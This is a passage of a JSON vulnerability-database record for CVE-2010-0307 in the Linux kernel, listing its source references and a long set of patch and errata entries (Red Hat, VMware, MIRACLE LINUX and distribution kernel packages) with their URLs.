        "db": "PACKETSTORM",
        "id": "98419",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "95883",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "87629",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85802",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86286",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "87376"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "87629"
      },
      {
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "id": "VAR-201002-0694",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T19:19:35.436000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.18.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1042"
      },
      {
        "title": "kernel-2.6.18-194.2.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1175"
      },
      {
        "title": "ChangeLog-2.6.32.8",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.8"
      },
      {
        "title": "2054",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2054"
      },
      {
        "title": "RHSA-2010:0146",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0146.html"
      },
      {
        "title": "RHSA-2010:0398",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0398.html"
      },
      {
        "title": "VMSA-2010-0016",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2010-0016.html"
      },
      {
        "title": "VMSA-2011-0003",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "title": "linux-headers-2.6.31-20_2.6.31-20.58_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3271"
      },
      {
        "title": "mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3275"
      },
      {
        "title": "kernel-pae-debugsource-2.6.25.20-0.7.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3279"
      },
      {
        "title": "kernel-vanilla-debugsource-2.6.25.20-0.7.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3283"
      },
      {
        "title": "ivtv-kmp-debug-1.0.3_2.6.25.20_0.7-66.1.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3287"
      },
      {
        "title": "input-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3217"
      },
      {
        "title": "kernel-image-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3221"
      },
      {
        "title": "fat-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3225"
      },
      {
        "title": "sata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3229"
      },
      {
        "title": "ppp-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3233"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3237"
      },
      {
        "title": "pata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3241"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3245"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3270"
      },
      {
        "title": "linux-image-2.6.31-20-virtual_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3274"
      },
      {
        "title": "kernel-debug-debuginfo-2.6.25.20-0.7.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3278"
      },
      {
        "title": "vmware-kmp-debug-2008.04.14_2.6.25.20_0.7-21.1.x86_64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3282"
      },
      {
        "title": "kernel-debug-2.6.25.20-0.7.x86_64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3286"
      },
      {
        "title": "kernel-xen-2.6.25.20-0.7.x86_64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3290"
      },
      {
        "title": "plip-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3250"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3254"
      },
      {
        "title": "linux-headers-2.6.31-20-generic_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3258"
      },
      {
        "title": "usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3262"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3266"
      },
      {
        "title": "changelog_2.6.32.8",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3196"
      },
      {
        "title": "linux-image-2.6.28-18-lpia_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3200"
      },
      {
        "title": "fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3204"
      },
      {
        "title": "virtio-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3208"
      },
      {
        "title": "floppy-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3212"
      },
      {
        "title": "nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3216"
      },
      {
        "title": "firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3220"
      },
      {
        "title": "scsi-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3224"
      },
      {
        "title": "pata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3228"
      },
      {
        "title": "plip-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3232"
      },
      {
        "title": "linux-source-2.6.27_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3236"
      },
      {
        "title": "sata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3240"
      },
      {
        "title": "char-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3244"
      },
      {
        "title": "input-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3269"
      },
      {
        "title": "block-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3273"
      },
      {
        "title": "nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3277"
      },
      {
        "title": "kqemu-kmp-debug-1.3.0pre11_2.6.25.20_0.7-7.1.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3281"
      },
      {
        "title": "kernel-debug-debugsource-2.6.25.20-0.7.x86_64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3285"
      },
      {
        "title": "kernel-debug-2.6.25.20-0.7.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3289"
      },
      {
        "title": "linux-headers-2.6.31-305_2.6.31-305.13_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3249"
      },
      {
        "title": "linux-headers-2.6.31-20-server_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3253"
      },
      {
        "title": "linux-image-2.6.31-20-server_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3257"
      },
      {
        "title": "nic-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3261"
      },
      {
        "title": "nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3265"
      },
      {
        "title": "linux-headers-2.6.27-17_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3199"
      },
      {
        "title": "linux-headers-2.6.28-18-lpia_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3203"
      },
      {
        "title": "nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3207"
      },
      {
        "title": "pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3211"
      },
      {
        "title": "linux-headers-2.6.28-18_2.6.28-18.60_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3215"
      },
      {
        "title": "fb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3219"
      },
      {
        "title": "nfs-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3223"
      },
      {
        "title": "usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3227"
      },
      {
        "title": "nic-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3231"
      },
      {
        "title": "linux-headers-2.6.27-17_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3235"
      },
      {
        "title": "md-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3239"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3243"
      },
      {
        "title": "ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3263"
      },
      {
        "title": "parport-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3267"
      },
      {
        "title": "md-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3214"
      },
      {
        "title": "block-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3218"
      },
      {
        "title": "irda-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3222"
      },
      {
        "title": "storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3226"
      },
      {
        "title": "fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3230"
      },
      {
        "title": "linux-doc-2.6.27_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3234"
      },
      {
        "title": "serial-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3238"
      },
      {
        "title": "scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3242"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3246"
      },
      {
        "title": "linux-source-2.6.27_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3198"
      },
      {
        "title": "message-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3202"
      },
      {
        "title": "mouse-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3206"
      },
      {
        "title": "serial-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3210"
      },
      {
        "title": "firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3272"
      },
      {
        "title": "linux-image-2.6.31-20-generic_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3276"
      },
      {
        "title": "at76_usb-kmp-debug-0.17_2.6.25.20_0.7-2.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3280"
      },
      {
        "title": "uvcvideo-kmp-debug-r200_2.6.25.20_0.7-2.4.x86_64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3284"
      },
      {
        "title": "drbd-kmp-debug-8.2.6_2.6.25.20_0.7-0.2.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3288"
      },
      {
        "title": "fb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3248"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3252"
      },
      {
        "title": "kernel-image-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3256"
      },
      {
        "title": "linux-headers-2.6.31-305-ec2_2.6.31-305.13_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3260"
      },
      {
        "title": "fat-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3264"
      },
      {
        "title": "linux-image-2.6.31-305-ec2_2.6.31-305.13_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3268"
      },
      {
        "title": "pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3213"
      },
      {
        "title": "linux-doc-2.6.27_2.6.27-17.46_all",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3197"
      },
      {
        "title": "nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3201"
      },
      {
        "title": "parport-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3205"
      },
      {
        "title": "crypto-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3209"
      },
      {
        "title": "kernel-default-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4900"
      },
      {
        "title": "kernel-default-extra-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4932"
      },
      {
        "title": "kernel-trace-base-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4936"
      },
      {
        "title": "kernel-xen-base-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4940"
      },
      {
        "title": "kernel-pae-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4904"
      },
      {
        "title": "kernel-trace-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4908"
      },
      {
        "title": "kernel-xen-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4912"
      },
      {
        "title": "kernel-default-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4916"
      },
      {
        "title": "kernel-ppc64-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4920"
      },
      {
        "title": "kernel-source-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4924"
      },
      {
        "title": "kernel-debug-base-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4928"
      },
      {
        "title": "kernel-debug-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4899"
      },
      {
        "title": "kernel-default-base-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4931"
      },
      {
        "title": "kernel-trace-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4935"
      },
      {
        "title": "kernel-xen-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4939"
      },
      {
        "title": "kernel-pae-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4903"
      },
      {
        "title": "kernel-syms-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4907"
      },
      {
        "title": "kernel-vanilla-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4911"
      },
      {
        "title": "kernel-docs-2.6.3-3.13.89.noarch.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4915"
      },
      {
        "title": "kernel-kdump-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4919"
      },
      {
        "title": "kernel-ps3-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4923"
      },
      {
        "title": "kernel-debug-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4927"
      },
      {
        "title": "kernel-debug-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4898"
      },
      {
        "title": "kernel-default-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4902"
      },
      {
        "title": "kernel-default-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4930"
      },
      {
        "title": "kernel-syms-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4934"
      },
      {
        "title": "kernel-vanilla-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4938"
      },
      {
        "title": "kernel-source-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4906"
      },
      {
        "title": "kernel-trace-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4910"
      },
      {
        "title": "kernel-xen-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4914"
      },
      {
        "title": "kernel-default-extra-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4918"
      },
      {
        "title": "kernel-ppc64-extra-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4922"
      },
      {
        "title": "kernel-vanilla-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4926"
      },
      {
        "title": "kernel-debug-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4897"
      },
      {
        "title": "kernel-default-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4901"
      },
      {
        "title": "kernel-source-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4933"
      },
      {
        "title": "kernel-trace-extra-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4937"
      },
      {
        "title": "kernel-xen-extra-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4941"
      },
      {
        "title": "kernel-pae-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4905"
      },
      {
        "title": "kernel-trace-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4909"
      },
      {
        "title": "kernel-xen-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4913"
      },
      {
        "title": "kernel-default-base-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4917"
      },
      {
        "title": "kernel-ppc64-base-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4921"
      },
      {
        "title": "kernel-syms-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4925"
      },
      {
        "title": "kernel-debug-extra-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4929"
      },
      {
        "title": "kernel-default-debugsource-2.6.25.20-0.7.i586",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3291"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3247"
      },
      {
        "title": "irda-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3251"
      },
      {
        "title": "modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3255"
      },
      {
        "title": "virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=3259"
      },
      {
        "title": "Red Hat: Moderate: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100771 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100146 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-914-1"
      },
      {
        "title": "VMware Security Advisories: VMware ESX third party update for Service Console kernel",
        "trust": 0.1,
